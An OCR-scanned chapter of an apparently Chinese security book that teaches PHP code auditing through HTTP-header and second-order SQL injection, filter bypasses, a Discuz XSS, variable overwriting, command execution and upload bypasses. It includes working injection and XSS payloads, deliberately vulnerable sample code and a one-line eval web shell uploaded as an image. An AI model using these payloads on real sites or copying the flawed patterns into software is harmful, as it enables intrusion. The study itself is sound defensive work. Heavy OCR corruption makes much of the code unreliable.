何 为 http 头 ? http 客 户 程序 向 服务 器 发 送 请 求 的 时 候 必须 指明 请 求 类 型 ， 从 而 产生 了 


http 头 。 


> 


> 


Ww - Ww 


常见 的 http 头 如 下 所 述 。 

Host: 初始 URL 中 的 主机 和 端口 。 

Referer: 包含 一 个 URL， 用 户 从 该 URL 代 表 的 页 面 出 发 访问 当前 请 求 的 页 面 。 
User-Agent: 浏览 器 类 型 。 

Accept: 浏览 器 可 接收 的 MIME 类 型 。 

Accept-Language: 浏览 器 所 希望 的 语言 种 类 。 

Connection: 表示 是 否 需要 持久 连接 。 

Content-Length: 表示 请 求 消息 正文 的 长 度 。 

Cookie: 这 是 最 重要 的 请 求 头 信 息 之 一 。 


而 在 审计 中 ， 常 见 的 http 头 可 能 被 污染 的 参数 如 下 。 


> 


> 


> 


> 


User-agent， 浏 览 器 类 型 ( 少 ) 。 
Referer, XX (Y). 
X-Forwarded-For, JUP C$). 
client ip, HIP C2) 。 


这 里 给 出 一 段 X-Forwarded-For 注 入 的 问题 代码 。 
Get .php: 


<?php 


?» 


$info ip-$ SERVER['HTTP X FORWARDED FOR']; // 获 取 X FORWARDED FOR 
$info referer = $ SERVER['HTTP REFERER']; 


$info user agent- $ SERVER['HTTP USER AGENT']; 


p Ao 
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Test.php: 

«?php 
include ('config.php'); 
include ('get.php'); 
$Sql-"INSERT INTO test info (ip) VALUES ($info ip) "; // 拼 接 语句 
$result-mysql query ($591); // 代 入 查询 
echo mysql_error(); 


?» 


ШЕ ЕХ FORWARDED FOR 参数 ， 输 入 单 引 号 ， 结 果 如 图 4-12 所 示 。 


bup: ur. aod Mw ано, 














cancel [ocatrost 


























User-Agent: Mozilla/S.D (Windows NT 6.1; гу:38.0) Gecko/20100101 Firefox/38.0 
Accept: text/html, applicatior/xhtmlixml, application/xml;q-0.9, */*. 
: zh-CN,zh;q*0.B, en-US; qD. $, en; q=0. 


Connection: keep-alive 














[> ][ 























headers 


Connection: Keep-Alive 
Content-Type: text/html 

















You have an error in your SQL syntax; check the manual that corresponds to your MySQL server 
Version for the right syntax to use near '')' at line 1 H 

















El 
] 0 matches. 
engin: 379 (1,031 milis) 



































图 4-12 http 头 注入 


424 二 次 注入 


随 着 安全 问题 日 趋 被 重视 ， 一 些 简单 的 SQL 注入 在 大 中 型 开源 程序 中 已 基本 销声匿迹 
了 。 而 出 现 更 多 的 则 是 二 次 注入 ， 相 对 于 一 次 注入 漏洞 而 言 ， 二 次 注入 漏洞 更 难以 被 发 
现 ， 但 是 它 却 具 有 与 一 次 注入 攻击 漏洞 相同 的 攻击 威力 。 

下 面 来 看 某 个 开源 商场 系统 的 漏洞 实例 。 

<?php 

if(isset($ SESSION['cart']['in'])) ( // 重 复 执行 订单 
unset($ SESSION['cart']); 
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} 


$_SESSION['cart']['in'] = 


cerror( ("submit order twice")); 


true; // 正 在 执行 订单 


$tradeid = $time.mt гапа (100,999); 


$data 


); 


= array( 


"tradeid" 

"uid" 

"uname" 

"addtime" 

"status" 
"totalfee" 
"itemfee" 
"postfee" 

"man" 

"coupon" 
"expresswayid" 
"posttype" 
"receiver_name" 
"receiver_province" 
"receiver_city" 
"receiver_district" 
"receiver_address" 
"receiver_zip" 
"receiver_link" 
"memo" 

"payment" 

"isEax" 


"tax company" 


= Stradeid, 

=> Sthis-»uid, 

=> $ sESSION['uname'], 

= $time, 

=> "WAIT PAY", // 未 支付 

=> getPrice($totalfee,2, 'int'), 
=) getPrice($itemfee,2, 'int'), 
getPrice ($роѕіѓее, 2, 'int'), 
$man ? $man['str'] : '', 
$coupon ? $coupon['deno'] : 0, 
$wayid, 

$posttype, 
$address['receiver'], 
$address['province'], 
$address['city'], 
$address['district'], 
$address['address'], 
$address['zipcode'], 
$address['link'], 

$memo, 

$paymentcode, 


$istax, 


УУУУ УУУ УУУ ФУ УУ ЧУУ 


$tax company 


DB::getDB()-»insert("trade",$data); //insert, 这 里 入 库 


$adddata = $promodata = array(); 


56 —— 


u 777 
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public function insert ($tableName, $data = array()) { 


$sql = "INSERT INTO ".$this->getTableName ($tableName) ; 
$sql .z"(".implode(",",array map(array($this,"escapekey"),array 
keys($data))).") values("; 
$sql .= Sthis-»getInsertVal ($data); 
$sgl = trim($sql,",").")"; 
Sthis-»query ($541); 
if(!S$this-»errno)( 
return $this-»lastid(); 
} 


return false; 


getImsertVal 中 还 嵌 套 了 几 个 函数 ， 不 过 并 没有 做 什么 过 滤 ， 故 此 省 略 。 从 下 面 的 代码 
中 来 找 找 出 库 的 地 方 。 


if($count) ( 
$this-»data["pagearr"] = getPageArr ($раде, $pagesize, $count, '', true) ; 
$this-»data['trades'] = DB::getDB()-»select ("trade", 
"tradeid,receiver name,totalfee,addtime,status,payment",$wherestr, 
"tradeid DESC",$this-»data['pagearr']['limit'],"tradeid"); 
// 这 里 出 库 , 同样 谋 套 了 几 个 函数 ,但 也 没有 进行 过 滤 同 样 省 略 
$tradeids = array_keys ($this->data['trades']); 
$orders = DB::getDB()-»select ("order","itemid,itemimg,itemname, 
tradeid,orderid","tradeid in ".cimplode ($tradeids)); 
foreach ($orders as Sorder) { 
$this->data['trades'] [$order['tradeid']] ['order'] [$order['orderid']] 
= Sorder; 
} 

} 

$this-»output ("gettrade"); 
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入 库 、 出 库 都 没有 进行 过 滤 ， 因 此 可 以 判定 存在 二 次 注入 。 再 回 到 insert 函 数 ， 可 以 


看 到 查询 语句 如 下 。 





INSERT INTO cart trade('tradeid','uid','uname','addtime','status', 
'totalfee','itemfee','postfee','man','coupon','expresswayid','post 
Eype','receiver name',' receiver province',' receiver city',"'receiver | 
district','receiver address','receiver zip','receiver link','memo','pay 
'istax','tax company')values('1418809144596',2,'test',1418809144, 
WATT PAY", 63005300, 1000-10072: 1 t ANTS BJA OEC OO QS о rs sj yj si. 


'','соа',0,'') 


ment' 





可 以 构造 receiver=', 1, 1, 1, user(), 1, 1, 1, 1, 0, 2)#， 和 逃逸 出 单 引 号 并 闭合 ， 用 # 注 释 掉 后 
面 多 余 的 语句 ， 提 交 过 程 如 图 4-13 所 示 。 


BRAME 





© ,1LLLuser0LLLLO2)# 


*,1,1,1,user0, 1,1,1, 
北京 ~- 北京 市 > - 东城 区 + 
100010 
保存 并 使 用 这 个 地 址 
4-13 ”提交 过 程 




















POST /index.php?model=buysaction=saveaddr HTTP/1.1 

Host: skyofdll.hlk.delldns.com 

User-Agent: Mozilla/S.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0 
accept: */* 

||Accept-Language: zh-CN, zh;q*0.8, en-US:;q-0.5, en:q-0.3 

Accept-Encoding: gzip, deflate 

Content-Type: application/x-www-form-urlencoded; charset=UTF-8 
X-Requested-With: XMLHttpRequest 

Referer: http://skyofdll.hlk.delldns.com/index.php?modelebuy 
Content-Length: 159 

Cookie: cart cart-item 47 3; 

cart sess-4032764f978ff7064aa7f18aDaa4266f120065£553; 

| D SID-SACC47AS4DCODI3BECESCBDBSBIFSAFS; cart sendsms-1; cart sendemail-l; 
cart history-47 

Connection: keep-alive 

Pragma: no-cache 

Cache-Control: no-cache 


кесеїуег='%2С1%2С1%2С1%2Сизег () %2С1%2С1%2С1%2С1%2С0%2С2)%23&ргоу1псе=11000й&с1су=1 
10100&district=110101&address=111&link=11111111111&zipcode=100010çaddressid=8 




















图 4-14 ”提交 的 数据 包 


je 
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成 功 提交 后 ， 切 到 个 人 中 心 ， 然 后 查看 订单 ， 如 图 4-15 所 示 ， 可 以 看 到 出 库 的 地 方 已 
经 “ 躺 着 ”注入 出 的 数据 了 。 





收 货 信息 

订单 号 : 1434373133743 

收 件 人 : 联系 电话 : 1 
收 件 人 地 址 : skyofdl1@localhost 
邮政 编码 : 1 





图 4-15 成 功 二 次 注入 


425 过 滤 的 绕 过 


在 开发 中 ， 开 发 人 员 想 尽 办 法 杜绝 注入 的 情况 出 现 ， 而 通常 采用 的 办 法 便 是 过 滤 。 
常见 的 过 滤 大 致 分 为 正则 和 关键 词 的 过 滤 ， 相 对 关键 词 的 过 滤 ， 正 则 过 滤 的 方式 则 更 
为 高 效 。 但 是 并 没有 绝对 安全 的 方法 ， 任 何 防御 都 存在 被 绕 过 的 风险 ， 而 常见 的 绕 过 
如 下 。 

> 大 小 写 混 合 。 
> 替换 关键 宁 。 
> 使 用 编码 。 
> 使 用 注释 。 
> 等 价 函 数 与 命令 。 
> 使 用 特殊 符号 。 
> http 参 数控 制 。 
> 整合 绕 过 。 

接 下 来 将 展示 几 个 对 关键 词 进行 过 滤 的 简单 bypass〈 绕 过 ) 方法 。 


1. 过 滤 代 码 
preg_match('/(and|orl|union|wherellimit)/I',$id) 


绕 过 方法 : 对 关键 词 and，or，union，where，limit 进 行 了 过 滤 ， 构 造 代码 类 似 于 11|| 
(select user from users group by user id having user id-1 ) = 'admin' 即 可 绕 过 。 


2. 过 滤 代 码 


preg_match ('/select |order |insert |update |eval|document |delete|injection|j 


ection|link[N'I|V%IN/AV*IV*IV-V-A/IN-N/IN IN-1I--IN" land, $str) 


绕 过 方法 : 仅 对 小 写 的 注入 关键 词 进行 了 过 滤 ， 大 写 即 可 绕 过 。 


озар. 


SN U meses 


43 XSS 审 计 


XSS 攻 击 是 近 些 年 盛行 的 一 种 攻击 方式 ， 恶 意 攻 击 者 往 Web 页 面 里 插入 恶意 html 代 
码 ， 当 用 户 浏览 该 网 页 时 ， 嵌 入 其 中 的 html 代 码 会 被 执行 ， 从 而 达到 恶意 攻击 用 户 的 特殊 
目的 。 而 PHP 中 对 XSS 的 审计 又 是 怎样 的 呢 ? 

这 是 一 个 Discuz 的 历史 漏洞 了 ，Discuz 第 一 时 间 在 X3.1 版 本 的 一 个 补丁 中 修复 了 这 一 
漏洞 ， 不 过 对 于 仍然 使 用 着 Discuz X3.1 旧 版 本 〈 其 实 绝 大 多 数 都 在 使 用 旧版 本 ， 因 为 补丁 
发 布 的 时 候 X3.1 已 经 发 布 很 久 了 ) 及 以 下 版 本 的 网 站 来 说 ， 这 个 漏洞 依然 有 效 。 下 面 我 们 
来 体验 一 下 这 个 漏洞 的 审计 过 程 。 

有 关 这 个 漏洞 的 代码 在 \uploadvsource\function\ 下 的 fanction discuzcode.php 中 。 


119 if($allowbbcode) { 


120 if(strpos($msglower, 'ed2k://') != FALSE) { 

$21 $message = preg_replace ("/ed2k:\/\/(.+?)\//e", "parseed2k('NN1')", 
$message); 

122 y 

1025) у 


很 显然 ， 这 段 代码 用 于 检测 是 否 启用 ed2k 协 议 并 在 第 121 行 对 ed2k 链 接 进行 了 处 理 。 
为 了 让 读者 更 清晰 地 理解 这 些 PHP 代 码 ， 本 书 假设 读者 对 PHP 的 掌握 处 于 入 门 阶段 ， 对 涉 
及 的 一 些 API 做 一 个 简单 介绍 。121 行 中 的 preg_replace 函 数 原型 如 下 。 


mixed preg replace ( mixed $pattern , mixed $replacement , mixed 
$subject [, int $limit = -1 [, int &$count ]] ) 

// preg_replace ”执行 一 个 正则 表达 式 的 搜索 和 替换 : 搜索 subject 中 匹配 pattern 的 部 分 ， 
用 replacement 进 行 替换 


对 于 刚刚 接触 代码 审计 的 初学 者 来 说 ， 可 能 会 感觉 自己 对 代码 的 掌握 程度 不 够 ， 没 关 
系 ， 每 种 语言 的 官方 手册 对 每 个 函数 都 有 详细 解释 以 供 开发 者 学 习 。 对 于 有 一 定 经 验 的 审 
计 者 来 说 ， 开 源 项 目的 手册 或 说 明文 中 仍 有 很 多 重要 的 部 分 ， 而 且 同 一 厂商 过 去 的 漏洞 也 
可 能 为 审计 引导 一 个 方向 ， 不 要 着 于 站 在 巨人 的 肩膀 上 ! 

这 个 函数 调用 parseed2k() 函 数 对 $message 进 行 正则 处 理 ， 下 面 来 跟踪 处 理 函 数 
parseed2k(). 


320 function parseed2k ($url) { 


321 global $ G; 

322 list(,$type, $name, $size,) = explode('|', $url); 
// 用 来 读 取 连 接 中 的 类 型 , 名 称 与 大 小 

323 $url = "ed2k;77"!.Surl." /A 


= 


324 
325 
326 
327 


331 
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Sname = addslashes (Sname) ; 

if ($type == 'file') ( 
$ed2kid = 'ed2k '.random(3); 
return '«a id-"'.$ed2kid.'" href-"'.$url.'" target-" 
blank"»'.dhtmlspecialchars(urldecode($name))." 
('.sizecount($size).')«/a»«script language-"javascript"» 
$(N''.$ed2kid.'NV') .innerHTML-htmlspecialchars (unescape 
(decodeURIComponent(N''.$name.'NV')))*N' ('.sizecount 
($size) .')\';</script>'; 

} else { 


return '«a href="" -Surl target-" blank"»'.$url.'«/a»'; 


从 这 段 代码 中 可 以 看 出 ，parseed2k() 并 没有 对 参数 $size 进 行 安全 处 理 ， 甚 至 没有 对 
$size 进 行 类 型 转换 (暂且 认为 这 是 程序 员 的 疏忽 ) ， 因 此 函数 sizecount($size) 中 传 入 的 是 
字符 串 类 型 的 gsize 变 量 。 

下 一 步 跟 进 sizecount() 函 数 ， 它 在 同 目录 下 的 function_core.php 中 : 


1601 
1602 
1603 
1604 
1605 
1606 
1607 
1608 
1609 
1610 
1611 
1612 


function sizecount($size) { 


} 


if($size >= 1073741824) { 

$size = round($size/1073741824 * 100) /100 . 'GB'; 
} else if ($size >= 1048576) { 

$size = round($size / 1048576 * 100) / 100 .' MB'; 
) else if($size >= 1024) { 

$size = round($size / 1024 * 100) / 100 . 'KB'; 
) else ( 


$size = $size . 'Bytes'; 


return $size; 


这 段 代 码 用 来 对 文件 大 小 进行 划分 ， 字 符 串 类 型 的 Ssize 的 值 在 与 Number 类 型 比较 
时 ， 会 被 强制 转换 成 Number 类 型 后 再 进行 比较 。 如 果 传 入 的 $Ssize 并 不 是 纯 数 字 字 符 串 ， 
那么 $size 的 值 会 被 转换 成 NaN (Not a Number) ， 不 会 触发 前 三 个 if 语 句 ， 直 接 进入 else 语 
名， 而 else 中 的 函数 并 没有 对 $size 进 行 类 型 转换 ， 直 接 与 'Bytes' 进 行 了 配对 ， 配 对 后 的 字 
符 串 被 最 终 返回 给 function _ discuzcode php 中 121 行 的 Smessage， 然 后 被 输出 。 

第 1609 行 代码 在 X3.1 补 丁 中 被 替换 为 : 


EN Ul 黑客 与 安全 技术 指南 


1609 $size = intval($size) . ' Bytes'; 

intval 函 数 将 $size 转 换 为 整 型 ， 因 此 避免 了 对 于 $size 的 XSS 攻 击 。 
下 面 来 实际 测试 一 下 : 

在 Discuz X3.1 或 以 下 版 本 的 论坛 中 发 帖 时 插入 这 样 一 句 : 


ed2k://|file|xss| '*alert(123)-*'|xss/ 
图 4-16 所 示 的 对 话 框 证 明了 漏洞 的 存在 。 


ios8.3 可 以 用 双双 助手 越狱 么 ?了 


Е ажет з жат к 








$088 , iosS.3 BILL FH S? S? врзаа, ? 


vely (+: РО 


图 4-16 XSS 对 话 框 

顺便 提 一 下 ， 这 个 漏洞 因为 格式 限制 不 能 包含 各 种 引号 。 不 要 灰心 ， 这 里 可 以 
用 document.write(String.fromCharCode(.… ...)); 的 方式 写 入 html 标 签 ， 如 <script src=..> 
</script>， 这 里 的 属性 src 不 需要 引号 即 可 加 载 外 部 JS 文件 ， 进 而 利用 这 个 漏洞 。 

通过 简单 地 分 析 可 以 发 现 ， 程 序 员 为 了 简化 代码 〈 其 实 打 完 补丁 之 后 并 没有 简化 ) 让 
字符 串 类 型 的 $size 通 过 强制 类 型 转换 与 整 型 比较 ， 然 后 直接 将 $size 与 表示 文件 大 小 、 单 位 
的 字符 串 进 行 连接 ， 这 种 简化 是 一 个 很 不 好 的 习惯 ， 在 编写 代码 时 应 避免 利用 强制 类 型 转 
换 来 比较 不 同类 型 变量 ， 这 种 方法 往往 会 被 攻击 者 利用 (就 像 这 里 一 样 )。 


44 ЯЛЕ 


何 为 变量 覆盖 ? 首先 要 了 解 PHP 的 特性 。PHP 是 一 种 类 型 松散 的 语言 ， 它 根据 变量 的 
值 自动 地 把 变量 转换 为 正确 的 数据 类 型 。 变 量 覆盖 就 是 指 攻 击 者 在 攻击 时 给 予 其 特定 的 
值 ， 并 才 盖 原 有 的 固定 值 ， 从 而 引发 一 些 安全 问题 。 下 面 介绍 常见 的 变量 覆盖 。 


4.4.1 变量 初始 化 


此 类 变量 覆盖 需要 在 register_global=on 时 才能 发 生 ， 下 面 来 看 “乌云 某 白 帽 子 ” 的 一 
个 漏洞 。 


<?php 
ЙА ЗЛЕ ЫДЫС ЛО 


puc WR rc 


u Tu. 
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case 'list': 


$totalNum = $mysql->numTable ("member", $where); 

// 省 略 无 关 代 码 . . . .. - 

$members = $mysql-»select("member","id,name,time,money,pro- 
vience,city,picture",$where,array("id DESC"),array(($page- 
1)*$pageNum,$pageNum)); www.2cto.com 

require(INCLUDE PATH."page.class.php"); 

$pageClass = new page($page,$totalNum,$pageNum, WEB URL."member/ 
u.php?action-list", true); 

$pageCode = $pageClass-»getCode|(); 

$smarty-»assign("webTitle","Z J|"); 

$smarty-»assign("uList", $members); 

$smarty-»assign("pageCode", $радесоде); 
$smarty-»display ("member/m и list.html"); 


function numTable ($table-'',$wheres-false) 


i 
$table = $this->dbPrefix.$table; 
$sql = "SELECT COUNT (*) AS num FROM `$table`"; 
if ($wheres) 
{ 
$sql .= " WHERE "7 
if(is array ($wheres)) 
t 


foreach ($wheres as $key => $val) 


t 
$whr[] = "^$key'-'".$val."'"; 


$sql.= implode(" AND ",$whr); 
} 
else if(is string($wheres)) 


t 
$sql.- $wheres; 


17 
$result = Sthis->fetch (Sthis->query(Ssql1) ) > 
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return $result['num']; 


?> 


这 里 变量 where 并 没有 进行 初始 化 ， 而 是 直接 代入 了 查询 语句 ， 从 而 导致 变量 覆盖 ， 
在 这 里 引发 了 注入 ， 注 入 格式 为 ?action=list&where= 注 入 语句 。 


44.2 ”危险 函数 引发 的 变量 覆盖 


extract() 函 数 的 作用 是 从 数组 中 把 变量 导入 到 当前 的 符号 表 中 。 当 函数 中 type 参 数 为 
默认 值 、 传 递 的 变量 同名 时 ， 会 进行 覆盖 ， 从 而 引发 其 他 安全 问题 。 下 面 来 看 某 开源 程 
序 代 码 。 


case 'check info gold': 

$json = new Services JSON; 
extract($ REQUEST); 
$m gold = $db-»getOne("select gold from ($table)member 
where userid-'$ userid' "); 
$data['kou'] = SCFG['info top gold'] * intval ($number); 
$data['gold'] = $m gold - $data['kou']; 
$data-$json-»encode ($data) ; 


echo $data; 


第 4 行 的 extract($ REQUEST) 命 令 导 致 了 变量 覆盖 ， 因 此 我 们 可 以 直接 覆盖 掉 $table， 
并 补 全 语句 ， 从 而 进行 注入 。 


45 ”命令 执行 
命令 执行 是 PHP 中 常见 的 一 种 漏洞 ， 这 种 漏洞 的 危害 较 大 ， 直 接 威胁 到 服务 器 的 安 


全 。 在 PHP 中 ， 命 令 执 行 往往 发 生 在 eval()、assert()、system()、exec()、shell_exec()、 
passthru()、escapeshellcmd(O 这 些 高 危 函 数 上 。 因 为 开发 者 的 疏忽 ， 这 些 函 数 所 执行 的 命令 


m dé — 


u 7 
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有 时 会 出 现 用 户 可 控 的 情况 ， 从 而 导致 攻击 者 提交 恶意 代码 达到 攻击 目的 。 下 面 将 对 其 进 
行 分 析 。 


45.1 常见 的 命令 执行 函数 


1. eval() 


该 函数 是 把 字符 串 按照 PHP 代 码 来 执行 。 语 法 格式 : 
eval(phpcode); 
下 面 是 一 段 问题 代码 : 


<?php 
$com-$ GET['com']; 
eval ($com); 


?> 


这 是 一 段 很 简单 的 代码 ， 可 以 看 到 代码 中 将 参数 com 的 值 传递 给 变量 com， 然 后 直接 
将 变量 com 的 值 当 作 PHP 代 码 来 执行 ， 于 是 漏洞 便 产 生 了 。 当 令 参 数 com 为 phpinfo(); 时 ， 
结果 如 图 4-17 所 示 。 


(Є , & localhosttestphp?com=phpinfo0; 9 + C |[а coooe сик AIB $ fo» | = 




















图 4-17 ”执行 phpinfo 命 令 


a= а 
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2. system() 


该 函数 类 似 C 语 言 的 system0 函 数 ， 用 来 执行 指令 ， 并 输出 结果 ， 语 法 格式 : 


system(string command. int [return_var]); 


下 面 是 一 段 问题 代码 : 


<?php 
$com-$ GET['com']; 
$result-system($com); 
echo $result; 


PES 


当 参 数 com 为 whoami 时 ， 结 果 如 图 4-18 所 示 。 
当 参 数 com 为 ping baidu.com 时 ， 结 果 如 图 4-19 所 示 。 


Ф 8 localhost/test.php?com=whoami 











INT 7] = ө SQt- XSS- Encryption- Encoding- Other- 
æ Load URL 
À зрно 
+) Execute 





E Enable Post data Г) Enable Referrer 
nt authority\system 


图 4-18 ”执行 Whoami 命 令 


3. array_map() 


4 ё осмһомлерһр?сот=рию @ 8 + С || О, Google «стек W | | 














了 | = © SQL- XSS- Encryption- Encoding- Other- 
Load URL | httpy/localhost/test. php?com=ping baidu.com 
Split URL 
(9 беле | 


[E Enable Post data [F] Enable Referrer 


正在 Ping baidu.com [183.207.239.6] 具有 32 字 节 的 数据 : ЖЗ 183.207.239.6 
的 回复 ; 字 节 =32 时 间 =7ms TTL-57 来 自 183.207.239.6 的 回复 ; 字 节 =32 时 

间 =5ms TTL=57 来 自 183.207.239.6 的 回复 : 字 节 =32 时 间 =7ms TTL-57 ЖЕЗ 

183.207.239.6 的 回复 : 字 节 =32 时 间 =6ms TTL-57 183.207.239.6 的 Ping 统计 
信息 : 数据 包 : 已 发 送 = 4 ,已 接收 = 4 , 丢失 = 0 (0% 丢失 ) ， 往 返 行程 的 估计 时 
间 ( 以 毫秒 为 单位 ) 最 短 = 5ms ,最 长 = 7ms , 平均 = 6ms 




















-19 执行 ping 命 令 


该 函数 返回 用 户 自 定义 函数 作用 后 的 数组 。 回 调 函 数 接 收 的 参数 数目 应 该 和 传递 给 
апау map() 函数 的 数组 数目 一 致 ， 语 法 格式 : 


array_map(function, arrayl, array2, array3...) 


下 面 是 一 段 问题 代码 : 


<?php 


$callback = $ GET[callback]; 


$аггау1 = array(0, 1, 2, 3); 


$аггау2 


?> 


array map ($ca11back, $аггау1); 


令 上 述 代码 中 的 参数 callback 为 phpinfo， 结 果 如 图 4-20 所 示 。 
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84-20 ”执行 phpinfo 命 令 


4.5.2 动态 函数 


在 实际 开发 中 ， 有 的 程序 员 想 动态 调用 某 些 函数 ， 却 往往 会 忽略 动态 函数 的 风险 。 
下 面 是 一 段 问题 代码 ; 


<?php 

function A($data)( 
echo "A:".$data; 

li 

function B($data)( 
echo "B:".$data; 

} 

if(isset($ GET['test Ғипс'])) { 
$test func = $ GET['test func']; 
$com = $_СЕТ['сош']; 
$test func($com); ”// 动 态 调用 


?» 


I WE I—— 
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在 上 述 代码 中 ， 程 序 员 原意 是 想 动 态 调用 A 函数 和 B 函 数 ， 所 以 把 变量 test_func 作 为 函 
数 名 ， 并 且 可 控 。 但 这 其 实 等 同 于 可 以 执行 任意 函数 ， 当 直接 令 参 数 test_ func 为 system， 
参数 com 为 ping baidu.com 时 ， 结 果 如 图 4-21 所 示 。 








—— 
http//'ocalh..gsS20baidu.com x (A 











ЖЕ 183.207 239.7 的 回复 字 节 =32 时 间 =14ms TTL-58 请 求 超时 。 ЖЫ 
32 时 间 =13ms TTL=58 183.207.239.7 的 Ping 统计 信息 : 数据 包 : 已 发 送 
= 1 (25% 丢失 ) ， 往 返 行程 的 估计 时 间 ( 忆 毫秒 为 单位 ): 最 短 = 13ms , 最 长 = 





图 4-21 直接 执行 ping 命 令 


46 Fii} 


何 为 上 传 绕 过 漏洞 ?熟悉 渗透 的 读者 一 定 知道 文件 上 传 是 getshell 的 主要 途径 之 一 ， 是 
用 来 获取 Web 权 限 的 重要 漏洞 方式 ， 也 常常 是 Web 渗 透 的 最 后 一 关 ， 可 见 其 重要 性 。 下 面 
便 来 剖析 常见 的 文件 上 传 绕 过 漏洞 。 


4.6.1 JavaScript 绕 过 


先 来 看 一 段 实例 代码 : 


<?php 
function uploadfile () 
t 

$configUp-array(); 


$configUp['type'] = array("flash","img"); // 上 传 允许 type 值 
$configUp [ ' img ' ] = array("jpg","bmp","gif","png"); //img 人 允许 后 缀 
$configUp['flash'] = array("flv","swf"); / /flash 人 允许 后 缀 
$configUp[ 'office'] = array("doc","docx","docm","dotx","dotm", 


be, hd bd Es fe A a et et eh fs rtt o ka HE Mw, 
"wkl", "wks", "аре", "ppt", "pptx", "pptn", "ppsx", "potx", "potm", "ppam") ; 


$configUp['message']=" 上 传 成 功 "; // 上 传 成 功 后 显示 的 消息 , 若 为 空 则 不 显示 
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?> 
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Wp 





$configUp['name']- mktime();  ”// 上 传 后 的 文件 命名 规则 , 这 里 以 UNIX 时 间 


RTA 


if(is uploaded file($ FILES['upload']['tmp name'])) 


// 判 断 上 传 类 型 是 否 被 允许 


$filearr=pathinfo($_FILES['upload']['name']); 
$filetype=$filearr["extension"]; 
if(!in_array($filetype,$configUp['img'])) 
mkhtml ($fn,"", "错误 的 文件 类 型 ! w); 

// 可 以 看 到 当 文件 名 非法 时 , 调用 mkhtml 函 数 
if($ FILES['upload']['size'] > $configUp["img size"]*1024) 
mkhtml ($£n, "", "上 传 的 文件 不 能 超过 " .$configup["img size"]."KB! "); 
$file abso=$configUp["img dir"]."/".$configUp['name'].".".$filetype; 
$file host-$ SERVER['DOCUMENT ROOT'].$file abso; 
if (move uploaded file($ FILES['upload']['tmp name'],$file host)) 
t 

mkhtml($fn,$file abso, S$configUp['message']); 
)else 
t 
mkhtml ($fn, "", "文件 上 传 失败 , 请 检查 上 传 目录 设置 和 目录 读 写 权 限 ") ; 


下 面 来 查看 mkhtml 函 数 。 


function mkhtml ($fn,$fileurl, $message) 


{ 


echo $str='<script type="text/javascript">window.parent.CKEDITOR. 
tools- callFunction (to sfn." AS Етене X... Smessaqe, "Niy; 
</8ск1їрЕ>* 


exit ($str); 
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p 


可 以 看 到 mkhtml 调 用 的 是 一 段 JavaScript 代 码 ， 我 们 再 回 到 uploadfile 函 数 中 。 


if(!in_array(S$filetypevS$SconfigUp["img"])){ 
$configUp['img'] = array("jpg","bmp","gif","png"); 


这 段 代 码 判断 当 文件 类 型 不 合法 时 便 调 用 mkhtml， 但 无 论调 用 是 否 失败 ， 都 会 执行 上 
传代 码 ， 因 此 只 要 禁用 JavaScript 就 能 知道 上 传 文件 的 路 径 了 。 

这 里 直接 改 包 代替 〈 因 为 JavaScript 是 客户 端 脚本 语言 ， 只 对 浏览 器 进行 了 限制 ) ， 
如 图 4-22 所 示 。 


PIT 本 一 TREE ТИЈ 


Request 


[Poems [ reooers | rex 


Content-Disposition: form-data; name-"usd nick" 


-| WebKitFormBoundarym2 &АШЁЗЬН2Е7285ч 
Concent-Disposition: form-data; name-"upkile"; filenane-"soIt.php" 
Content-Type: image/jpeg 














<?php Beval(f_FOST['brute')); > 
WebKitFormBoundarym: é. 


GJ LJ LJ LJ Туре а ses 





Response 


f m [ences [ чех [ нты T renser 


Pragma: no-cache 
Vary: Accept-Encoding 
Content-Length: 462 
Content-Type: text/html 








<шеса http-equiv-"content-Type" coatent^"text/htmis charseraurten" 
<script language*"javascript"» 

parent.document.getBlementByTd 

parent.document.getElementById 

paront .docunent . getElement ' 

color=red>CDOD</Eont>/uploa 1004/1412405028.phpcimg src="/uploads/sys/cancel.png' width-'16" 
onelick-'hiddenLoding()" 
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4.6.2 文件 头 验证 绕 过 


问题 代码 如 下 。 


<?php 

if($ FILES[userfile] [type] != "image/gif") 
t 

echo "对 不 起 ,我 们 只 允许 上 传 6IF 格 式 的 图 片 ! !"; 
exit; 

} 


$dir = PreviousFile/; 
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T. 





$PreviousFile = $dir.basename($ FILES[userfile] [name] ) ; 

if (move uploaded file ($ FILES[userfile] [tmp name], $PreviousFile)) 
t 

echo "文件 是 有 效 的 ,成 功 上 传 !!11"; 


} else { 

echo "文件 上 传 错误 ! ! | 请 重新 上 传 ! ! ! ! "; 
} 

?» 


上 面 的 代码 对 文件 类 型 进行 了 判断 ， 只 允许 了 image/gif 这 种 类 型 。 但 是 人 们 仍 可 以 伪 
造 GIF89A 这 样 的 文件 头 进行 上 传 。 


4.6.3 ”逻辑 问题 


实例 代码 如 下 。 
<?php 
// 省 略 无 关 代码 
if($split values[0] == strtolower($split img[1]) && $split_ 
values[1] == "allow") 
t 
$invalidimg - false; 
$i = Sextcount + 1000; 
} elseif($i == $i values && $split values[0] !- 


strtolower($split img[1])) 
{ 
// If the image was valid, we would have exited by now. 


$еггог_оссигеа = true; 


} 
// 省 略 无 关 代码 

if($user_dat['usedspace'] < $dirsize) 

{ 
Е (е өхїзЕЗ(дазет dat изат 5 
FILES[$whichfile] ['name'])) 
{ 

if($ POST['overwrite file'] == true) 


t 
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unlink ($user dat['usrdir']."/".$ FILES 
[$whichfile] ['name']) ; 
) eise ( 


$error occured = true; 


echo "您 试图 上 传 的 文件 已 经 存在 <br /> 请 选择 覆盖 
或 者 更 改 文件 名 重新 上 传 .<br /»«br /»"; 


} 
} else ( 
$error occured = true; 
echo "您 已 经 用 光 了 所 有 的 目录 空间 .<br />"; 
} 
) else { 


$error_occured = true; 


echo "目录 不 存在 . 请 联系 管理 员 .<br />"; 


if ($еггог occured != true) 
t 
if (move uploaded file ($ FILES[$whichfile] ['tmp name'], 
$user dat['usrdir'] . "/" . $ FILES[$whichfile] ['name']) ) 
t 
rename ($user dat['usrdir']."/".$ FILES[S$whichfile] ['name'], 
susor dat ['usrcdir] =- T/T Ssplit imQ[0] mmo 
strtolower ($split_img[1])); 
// 省 略 无 关 代码 


?» 


问题 出 在 后 绥 判 断 和 rename 函 数 上 ， 先 来 看 一 下 后 绥 判 断 。 


if($split values[0] == strtolower($split img[1]) && $split values[1] == 


"allow") 


当 上 传 xx.jpg.php 时 : 


$split values[0]-** 
$split values[1]=jpg 
$split values[2]=php 





EAS KENBH C EET = s 





但 可 以 看 到 if 语 句 并 没有 判断 $split_ values[2]， 因 此 成 功 绕 过 ， 进 入 rename 函 数 。 


